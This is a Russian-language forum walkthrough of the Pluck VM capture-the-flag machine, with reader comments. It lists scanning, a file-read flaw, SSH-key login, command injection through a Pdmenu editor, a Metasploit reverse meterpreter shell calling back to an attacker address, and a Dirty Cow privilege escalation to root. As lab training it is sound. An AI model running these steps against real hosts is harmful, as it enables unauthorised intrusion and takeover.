• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

CTF CTF. Hack the Pluck VM.

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 352
BIT
0
Привет! В этой статье речь пойдет о CTF - Capture the Flag — это хакерские соревнования. На форуме есть несколько статей подобной тематики, поэтому, я не буду заострять внимание на подробностях, а сразу перейду к делу. Сегодня в качестве уязвимой системы я буду использовать Pluck VM.

upload_2017-4-13_21-25-45.png


Скачать уязвимую VM можно отсюда -

Монтируем образ в VM Ware и запускаем. Теперь необходимо выяснить адрес VM в нашей сети:

> netdiscover – r 172.16.0.1/16

upload_2017-4-13_21-26-6.png


Я выделил желтым ее адрес в моей локальной сети. Запустим сканирование портов:

> nmap –p- -A 172.16.0.163

upload_2017-4-13_21-26-24.png


На данном этапе сканирования, интерес представляет открытый 80 порт и запущенный на нем Apache, к нему присмотримся внимательней, с помощью nikto:

> nikto –h

upload_2017-4-13_21-26-45.png


Здесь внимание привлекает обнаруженная уязвимость, которая позволит просмотреть все файлы на сервере. Воспользуемся этим, поместим данную информацию в адресную строку браузера.

upload_2017-4-13_21-27-9.png


Из всего, того, что мы здесь видим, нас больше всего интересует путь к файлу с бэкапом, его и подставим следующим в адресную строку:

upload_2017-4-13_21-27-24.png


Теперь мы знаем, где хранится архив с бэкапом, и можем его вытащить оттуда с помощью wget:

> wget

upload_2017-4-13_21-27-51.png


Естественно следующим шагом будет распаковка архива:

> tar –xvf index.php\?page\=%2Fbackups%2Fbackup.tar

upload_2017-4-13_21-28-9.png


Распаковка прошла не совсем удачно, зато мы нашли папку /home и три папки пользователей.

upload_2017-4-13_21-28-28.png



Во всех папках пусто, кроме /paul, внутри находятся файлы со следующим содержимым:

upload_2017-4-13_21-28-43.png



Это не что иное, как файлы ключей ssh, перебирая по порядку, мне удалось залогиниться на сервере с помощью 4-го ключа:

upload_2017-4-13_21-29-1.png


Встречает нас Pdmenu, для тех кто не в курсе, это такой способ разрешить незнакомому с консолью человеку выполнять какие либо действия на сервере, используя удобное меню, и не заморачиваясь с введением команд. Так оно выглядит:

upload_2017-4-13_21-29-20.png


На мысль об уязвимости наталкивает пункт в меню – Edit File. Вероятно, с его помощью мы сможем выполнить произвольный код.

Для эксплуатации этой уязвимости будем использовать Web Delivery Exploit представленный в Metasploit Framework:

> msfconsole

> use exploit/multi/script/web_delivery

> set target 1

> set payload php/meterpreter/reverse_tcp

> set lhost 192.168.0.106

> set lport 4444

> set srvport 8081

> exploit


upload_2017-4-13_21-29-50.png


Выделенную строку копируем в поле изменения файла:

upload_2017-4-13_21-30-6.png


НО, перед началом строки ставим - ;

Затем жмем enter и выходим из vi, вернувшись на скрин с Metasploit, видим открытую сессию meterpreter:

upload_2017-4-13_21-30-21.png


Осмотримся в системе и откроем shell:

upload_2017-4-13_21-30-35.png


Для повышения привилегий в системе используем эксплоит Dirty Cow, скачиваем его через шелл на уязвимый хост:

> wget

upload_2017-4-13_21-30-53.png


Переименуем сохраненный файл 40616, к примеру, в shell.c и скомпилируем его в исполняемый файл с помощью компилятора gcc и опции –pthread:

> mv 40616 shell.c

> gcc shell.c –o cow –pthread

upload_2017-4-13_21-31-13.png


Запускаем наш готовый файл:

> ./cow

Перейдем в каталог /root

> cd /root

> ls –a

И возьмем флаг:

> cat flag.txt

upload_2017-4-13_21-31-39.png


На этом прохождение Pluck VM закончено. Спасибо за внимание.
 
I

Inject0r

обожаю такие статьи, давно не было, качаю виртуалку, буду пробовать :)
[doublepost=1492241308,1492240242][/doublepost]Vander, а можешь статью по nikto отдельную сделать, на что обращать внимание в выводе, какие уязвимости прога может обнаружить, типичные уязвимости в выводе nikto и их эксплуатация? Или может готовые статьи знаешь какие-нибудь? Даже банальнйы разбор каждой строчки вывода nikto из этой статьи уже был бы интересен
 
  • Нравится
Реакции: Vander и w3n0m41k

w3n0m41k

Green Team
30.10.2016
68
46
BIT
0
плюсую за статью очень интересно и познавательно и описано довольно подробно и понятно молодец! Согласен с предыдущим коментом про nikto можноотдельно статью написать?)))))))
 
  • Нравится
Реакции: Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 352
BIT
0
обожаю такие статьи, давно не было, качаю виртуалку, буду пробовать :)
[doublepost=1492241308,1492240242][/doublepost]Vander, а можешь статью по nikto отдельную сделать, на что обращать внимание в выводе, какие уязвимости прога может обнаружить, типичные уязвимости в выводе nikto и их эксплуатация? Или может готовые статьи знаешь какие-нибудь? Даже банальнйы разбор каждой строчки вывода nikto из этой статьи уже был бы интересен
Я постараюсь написать про него на этих выходных.
 
F

Free

как всегда автор на высоте,
качаю и ставлю на vmware.
ждем новых квестов и решений
 
  • Нравится
Реакции: Vander
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!